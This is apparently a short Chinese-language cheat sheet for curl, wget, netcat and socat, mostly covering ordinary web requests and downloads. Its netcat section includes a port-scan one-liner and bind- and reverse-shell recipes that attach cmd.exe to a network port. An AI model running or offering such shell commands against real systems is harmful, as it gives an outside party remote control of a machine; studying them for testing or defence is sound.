-
Notifications
You must be signed in to change notification settings - Fork 7
nc curl wget socat常用命令
很好很强大的命令行网络工具
curl wwww.baidu.com 查看网页源码
curl www.baidu.com -o filename 保存网页至本地
curl -L www.sina.com 跟随跳转 location
curl -i www.baidu.com 显示头信息和html源码
curl -I www.baidu.com 只显示响应头信息
curl -X POST --data "xxx=yyy" www.baidu.com post传输数据
curl -X POST --data-urlencode "xxx=yyy" www.baidu.com -d 将post内容经过urlencode
curl --referer http://www.sina.com/index.html http://baidu.com -e 为请求头添加referer
curl --user-agent "[User Agent]" www.baidu.com -A
curl --cookie "name=xxx" www.baidu.com -b
curl --header "Content-Type:application/json" http://www.baidu.com -H
wget http://www.baidu.com 将下载百度首页html代码
wget http://url/file -O dir/filename 下载文件至指定文件夹,并重命名
wget -m http://www.baidu.com 制作镜像站点,,
wget -c http://url/file 断点续传
wget -i download.txt 批量下载
nc -l -p -v 12345 -l 监听端口,-p 后跟端口号,-v显示端口信息,-vv显示更详细信息
nc -l -p 80 监听80端口,运行这个,端口80是被认为是开放的,欺骗扫瞄器,蜜罐
nc -v -w 1 ip -z 19-25 端口扫描,-v输出详细信息,-w设定间隔时间,-z关掉输入输出加快扫描,19-25端口范围
正向shell:
【远程运行】nc -l -p port -e C:/WINDOWS/system32/cmd.exe
【本地运行】nc -vv 192.168.1.101 port
反向shell:
【本地运行】nc -l –vv -p port
【远程运行】nc -e C:/WINDOWS/system32/cmd.exe ip port
mknod,,mkfifo
socat - tcp:192.168.1.18:80 相当于 nc 192.168.1.18 80
其他就看官方文档吧,http://www.dest-unreach.org/socat/doc/socat.html
还有,这个是打比赛的时候跟学长学到的姿势
socat tcp-l:12345,fork EXEC:./xxx